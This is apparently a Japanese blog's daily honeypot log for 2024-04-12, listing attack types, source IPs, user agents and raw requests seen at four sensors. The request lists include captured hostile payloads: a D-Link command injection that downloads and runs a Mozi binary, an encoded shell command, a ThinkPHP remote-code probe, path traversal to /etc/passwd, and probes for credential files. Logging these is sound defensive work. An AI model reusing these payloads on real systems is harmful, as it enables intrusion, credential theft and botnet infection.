コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/04/12 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2024/04/12分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
fasthttpによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:US

Gh0stRATのような動き

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:SG

Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
fasthttpによるスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:69 (前日比:-2181)
US:総アクセス数:63 (前日比:-21)
UK:総アクセス数:114 (前日比:28)
SG:総アクセス数:88 (前日比:-17)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
5 18.191.132.40 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.139.104.46 Bulgaria
3 47.237.78.140 United States
1 64.62.156.20 United States
1 64.62.156.67 United States
1 87.121.69.52 Bulgaria
1 91.92.245.67 Bulgaria
1 91.215.85.61 Russia
1 94.156.65.122 Bulgaria
10 101.32.192.203 Singapore
2 104.192.0.61 United States
1 112.239.21.5 China
8 135.125.217.54 France
4 135.125.246.110 France
5 135.125.246.189 France
1 159.203.208.34 United States
1 162.215.171.162 United States
1 162.243.144.9 United States
2 168.76.20.229 South Africa
2 185.180.143.50 Portugal
3 185.254.196.173 Ukraine
6 185.254.196.186 Ukraine
2 198.235.24.161 United States
2 205.210.31.184 United States
1 206.168.34.182 United States
1 222.137.7.147 China

UserAgent一覧

件数 UserAgent
8 -
1 Baiduspider ( http[:]//www[.]baidu[.]com/search/spider.htm)
3 Go-http-client/1.1
1 Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 8.0.0; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; VOG-L09 Build/HUAWEIVOG-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.128 Mobile Safari/537.36 (Ecosia android@69.0.3497.128)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
28 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
3 fasthttp

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
6 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
29 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.gitlab-ci.yml HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4NTFcXHg1N1xceDRhXFx4NTNcXHg1N1xceDZiXFx4NmJcXHg2YVxceDc4XFx4NzdcXHg0YVxceDU3XFx4NGFcXHg1OFxceDRmXFx4NmFcXHg3N1xceDZiXFx4NmFcXHg0YVxceDRiXFx4NTd8c2g= HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /v3/time HTTP/1.1
1 GET /zabbix/favicon.ico HTTP/1.1
10 HEAD /Core/Skin/Login.aspx HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.79.128.205 United States
3 45.79.181.251 United States
1 45.125.66.34 Hong Kong
4 54.36.115.221 France
14 57.129.23.166 France
1 64.62.197.31 United States
1 66.175.213.4 United States
1 66.240.205.34 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
4 87.121.69.52 Bulgaria
1 106.75.165.113 China
1 107.170.248.44 United States
1 139.59.101.104 Singapore
1 152.42.224.28 United States
2 162.142.125.13 United States
6 165.154.120.223 Hong Kong
2 165.154.206.250 Hong Kong
2 167.94.138.36 United States
2 168.76.20.229 South Africa
1 172.104.11.34 United States
1 172.104.11.46 United States
3 184.105.247.195 United States
1 185.196.10.155 United States
2 185.216.71.4 Bulgaria
1 188.215.235.218 Romania
2 198.235.24.5 United States

UserAgent一覧

件数 UserAgent
19 -
10 Go-http-client/1.1
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 \x16\x03\x01\x01)\x01
1 \x16\x03\x01\x01H\x01
12 \x16\x03\x01
5 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT pro.ip-api[.]com:443 HTTP/1.1
1 GET /.DS_Store HTTP/1.1
21 GET /.env HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /webui/ HTTP/1.1
1 HEAD /.env HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
1 t3 12.1.2\n
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
4 18.191.132.40 United States
1 35.178.239.159 United States
40 43.163.238.85 China
1 45.33.80.243 United States
1 45.79.181.179 United States
1 45.79.181.223 United States
2 45.125.66.34 Hong Kong
2 45.128.232.213 Bulgaria
1 45.142.182.118 Germany
8 54.36.115.221 France
9 57.129.23.166 France
1 64.62.197.53 United States
1 65.49.1.57 United States
1 65.49.1.60 United States
1 65.49.1.63 United States
1 66.175.213.4 United States
1 66.240.192.82 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
1 80.66.88.204 Russia
1 85.114.127.7 Palestine
4 87.121.69.52 Bulgaria
1 103.114.106.107 Vietnam
1 115.55.227.243 China
1 139.59.101.104 Singapore
1 152.42.176.18 United States
1 159.89.32.120 United States
2 167.94.138.51 United States
2 167.94.146.52 United States
2 168.76.20.229 South Africa
1 172.104.11.4 United States
1 172.104.242.173 United States
1 172.105.128.11 United States
1 172.105.128.13 United States
4 185.165.191.27 Seychelles
2 185.180.143.189 Portugal
1 185.196.10.155 United States
1 192.241.222.92 United States
2 198.235.24.111 United States
2 205.210.31.15 United States
1 212.70.149.134 Bulgaria

UserAgent一覧

件数 UserAgent
8 'Mozilla/5.0
51 -
8 Go-http-client/1.1
1 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 9; Nokia 7.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43
1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (X11; U; Linux armv7l like Android; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/533.2+ Kindle/3.0+
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
2 Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31
1 localhost.localdomain/go-network-v2.0.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\x9e\x01
4 \x16\x03\x01\x01\xa8\x01
2 \x16\x03\x01\x01\xb5\x01
21 \x16\x03\x01
2 \x16\x03\x02\x01\x9b\x01
2 \x16\x03\x03\x01I\x01
2 \x16\x03\x03\x01W\x01
2 \x16\x03\x03\x01\x9a\x01
4 \x16\x03\x03\x01\xa6\x01
1 ``
7 CONNECT google[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
21 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.gitlab-ci.yml HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi/conf.bin HTTP/1.1
6 GET /favicon.ico HTTP/1.1
2 GET /fw6I HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /login HTTP/1.1
1 GET /new/login HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /search/s.php?i=1&id=APOX8NWOV42320 HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wh/glass.php HTTP/1.1
1 GET /zMLUH93A HTTP/1.1
1 GET /zabbix/favicon.ico HTTP/1.1
1 GET http[:]//httpbin[.]org/ip HTTP/1.1
1 POST //api/attach HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /HNAP1/ HTTP/1.1
1 POST /QKBFJBVZsPKeqFS/HAchGeCttVyEtqZ.php HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /nvidia_license_upd.php HTTP/1.1
1 POST /session HTTP/1.1
1 POST /wp-content/themes/twentytwentyone/inc/block-css.php HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
2 45.125.66.34 Hong Kong
2 45.128.232.213 Bulgaria
3 47.237.77.12 United States
5 51.159.102.237 France
2 54.36.115.221 France
10 54.37.79.75 France
1 66.240.192.82 United States
1 73.75.132.35 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
1 80.66.88.215 Russia
4 87.121.69.52 Bulgaria
9 89.169.20.202 Russia
1 107.170.240.30 United States
1 138.197.113.93 United States
1 143.110.200.8 United States
2 143.198.204.194 United States
1 152.42.176.18 United States
2 152.42.224.28 United States
2 162.142.125.10 United States
2 169.197.86.76 United States
1 172.104.11.4 United States
10 175.6.40.66 China
3 184.105.247.194 United States
1 185.196.10.155 United States
1 192.241.225.74 United States
2 205.210.31.75 United States
5 208.100.26.232 United States
1 213.226.123.98 Russia
1 216.218.206.68 United States

UserAgent一覧

件数 UserAgent
30 -
8 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3
1 Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
5 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 curl/7.81.0
3 fasthttp

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x07\x01
16 \x16\x03\x01
6 CONNECT google[.]com:443 HTTP/1.1
1 GET /../../../../../etc/passwd%00 HTTP/1.0
1 GET /../../../../../etc/passwd%00 HTTP/1.1
1 GET /../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../etc/passwd HTTP/1.0
1 GET /../../../../../mnt/mtd/Config/Account1 HTTP/1.1
1 GET /../../../../../mnt/mtd/Config/Account1 HTTP/1.0
18 GET /.env HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /ads.txt HTTP/1.1
1 GET /app-ads.txt HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /current_config/Account1 HTTP/1.1
1 GET /current_config/passwd HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /evox/about HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /nmaplowercheck1712802143 HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sellers.json HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET http[:]//httpbin[.]org/ip HTTP/1.1
2 HEAD / HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0